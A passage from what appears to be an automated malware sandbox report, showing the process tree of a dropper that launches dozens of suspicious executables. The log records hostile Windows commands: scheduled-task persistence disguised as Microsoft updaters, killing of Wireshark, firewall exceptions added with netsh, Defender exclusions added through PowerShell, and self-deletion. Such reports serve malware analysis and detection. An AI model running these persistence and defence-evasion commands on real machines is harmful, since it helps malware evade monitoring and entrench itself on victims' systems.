C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\main.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\main.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3900 -
C:\ProgramData\dllhost.exe"C:\ProgramData\dllhost.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:3468 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3624
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f4⤵PID:3628
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe4⤵
- Scheduled Task/Job: Scheduled Task
PID:3816
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2516
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f4⤵
- System Location Discovery: System Language Discovery
PID:3248
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe4⤵
- Scheduled Task/Job: Scheduled Task
PID:2360
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:1640
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f4⤵PID:2072
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe4⤵
- System Location Discovery: System Language Discovery
PID:4088
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe4⤵
- Kills process with taskkill
PID:1584
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f4⤵
- System Location Discovery: System Language Discovery
PID:2376
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2456
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:5068
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f4⤵PID:2972
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5092
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe4⤵
- Kills process with taskkill
PID:6552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f4⤵PID:3936
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe4⤵PID:9640
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe4⤵
- Kills process with taskkill
PID:4744
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f4⤵PID:10000
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe4⤵PID:10568
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe4⤵
- Kills process with taskkill
PID:9676
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f4⤵PID:6740
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe4⤵
- Scheduled Task/Job: Scheduled Task
PID:7732
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe4⤵
- Kills process with taskkill
PID:5208
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f4⤵PID:5356
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe4⤵PID:4464
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe4⤵
- Kills process with taskkill
PID:15284
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f4⤵PID:8844
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe4⤵
- Scheduled Task/Job: Scheduled Task
PID:9160
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe4⤵
- Kills process with taskkill
PID:6428
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f4⤵PID:5692
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe4⤵
- Scheduled Task/Job: Scheduled Task
PID:7448
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe4⤵
- Kills process with taskkill
PID:11684
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f4⤵PID:11840
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe4⤵
- Scheduled Task/Job: Scheduled Task
PID:12020
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe4⤵
- Kills process with taskkill
PID:12932
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f4⤵PID:13092
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe4⤵PID:13284
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f im Wireshark.exe4⤵
- Kills process with taskkill
PID:14528
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f4⤵PID:14732
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe4⤵
- Scheduled Task/Job: Scheduled Task
PID:2832
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 5 & Del "C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\main.exe"3⤵
- System Location Discovery: System Language Discovery
PID:3540 -
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 54⤵
- System Location Discovery: System Language Discovery
PID:1668
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\discord.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\discord.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:3980 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Microsoft Service" /sc ONLOGON /tr "C:\Windows\system32\SubDir\main-pc.exe" /rl HIGHEST /f3⤵PID:4032
-
-
C:\Windows\system32\SubDir\main-pc.exe"C:\Windows\system32\SubDir\main-pc.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4068 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Microsoft Service" /sc ONLOGON /tr "C:\Windows\system32\SubDir\main-pc.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:3152
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\XClient.exe"2⤵
- Executes dropped EXE
PID:1432
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\build.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\build.exe"2⤵PID:2032
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\hjgesadfseawd.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\hjgesadfseawd.exe"2⤵PID:3696
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Client-built.exe"2⤵PID:1408
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\wmfdist.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\wmfdist.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4064
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\compiled.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\compiled.exe"2⤵PID:3892
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\compiled.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\compiled.exe"3⤵
- System Location Discovery: System Language Discovery
PID:3000
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\joiner.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\joiner.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3964 -
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"3⤵
- Drops startup file
- Drops autorun.inf file
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:3896 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2300
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:920
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2980
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"4⤵PID:3180
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"5⤵
- Drops startup file
- Drops file in System32 directory
PID:2468 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3992
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4060
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:276
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"6⤵
- System Location Discovery: System Language Discovery
PID:1000 -
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"7⤵
- Drops startup file
- Drops file in System32 directory
PID:1612 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4092
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2828
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4048
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"8⤵
- System Location Discovery: System Language Discovery
PID:1928 -
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"9⤵
- Drops startup file
- Drops file in System32 directory
PID:3384 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE10⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4636
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"10⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4708
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE10⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4716
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"10⤵
- System Location Discovery: System Language Discovery
PID:4792 -
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"11⤵
- Drops startup file
- Drops file in System32 directory
PID:3148 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE12⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:812
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"12⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4900
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE12⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4896
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"12⤵
- System Location Discovery: System Language Discovery
PID:656 -
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"13⤵
- Drops startup file
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:3736 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE14⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4356
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"14⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4592
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE14⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4608
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"14⤵PID:4528
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"15⤵
- Drops startup file
- Drops file in System32 directory
PID:5004 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE16⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4488
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"16⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4744
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE16⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4268
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"16⤵PID:2996
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"17⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
PID:4952 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE18⤵
- Modifies Windows Firewall
PID:9380
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"18⤵
- Modifies Windows Firewall
PID:6952
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE18⤵
- Modifies Windows Firewall
PID:8420
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 100818⤵PID:6372
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"18⤵PID:8952
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"19⤵PID:5828
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE20⤵
- Modifies Windows Firewall
PID:10120
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"20⤵
- Modifies Windows Firewall
PID:4316
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE20⤵
- Modifies Windows Firewall
PID:1764
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"20⤵PID:10960
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"21⤵PID:7720
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE22⤵
- Modifies Windows Firewall
PID:7480
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"22⤵
- Modifies Windows Firewall
PID:1784
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE22⤵
- Modifies Windows Firewall
PID:2720
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 81222⤵PID:880
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\hbfgjhhesfd.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\hbfgjhhesfd.exe"2⤵PID:4660
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Amogus.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Amogus.exe"2⤵PID:4552
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:4724
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"3⤵PID:220
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f4⤵PID:4260
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\7DfYnO3VgoM7.bat" "4⤵PID:6812
-
C:\Windows\system32\chcp.comchcp 650015⤵PID:9300
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6180
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"5⤵PID:10948
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:11060
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\UY7sLi1zDlaZ.bat" "6⤵PID:8368
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:5916
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8576
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"7⤵PID:9860
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:6224
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\ZfmyoICwMNYh.bat" "8⤵PID:7744
-
C:\Windows\system32\chcp.comchcp 650019⤵PID:5732
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost9⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6116
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe"9⤵PID:6440
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Win64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Win64.exe" /rl HIGHEST /f10⤵
- Scheduled Task/Job: Scheduled Task
PID:3660
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\LNOs8K9rsQVP.bat" "10⤵PID:8160
-
C:\Windows\system32\chcp.comchcp 6500111⤵PID:14536
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost11⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5036
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\lkyhjksefa.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\lkyhjksefa.exe"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:4664
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\mimilove.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\mimilove.exe"2⤵PID:4500
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\JJSPLOIT.V2.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\JJSPLOIT.V2.exe"2⤵PID:7000
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:8196
-
-
C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"3⤵PID:7200
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:10276
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\xOC5Tol6I2ng.bat" "4⤵PID:6188
-
C:\Windows\system32\chcp.comchcp 650015⤵PID:11020
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9556
-
-
C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"5⤵PID:3896
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\svchost.exe"2⤵PID:5780
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:6540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:6532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost'3⤵
- Command and Scripting Interpreter: PowerShell
PID:10384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost'3⤵
- Command and Scripting Interpreter: PowerShell
PID:10792
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\hack.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\hack.exe"2⤵PID:3440
-
C:\windows\system32\mspaint.exeC:\windows\system32\mspaint.exe3⤵PID:11000
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Session-https.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Session-https.exe"2⤵PID:6020
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\NBYS%20ASM.NET.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\NBYS%20ASM.NET.exe"2⤵PID:8520
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\laz.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\laz.exe"2⤵PID:5524
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5715.tmp\5716.tmp\5717.bat C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\laz.exe"3⤵PID:10640
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\example_win32_dx11.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\example_win32_dx11.exe"2⤵PID:4388
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\testingfile.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\testingfile.exe"2⤵PID:5268
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\TikTokDesktop18.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\TikTokDesktop18.exe"2⤵PID:12100
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\MFoxT3DN'"3⤵
- Command and Scripting Interpreter: PowerShell
PID:9424
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\jtkhikadjthsad.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\jtkhikadjthsad.exe"2⤵PID:12156
-
-
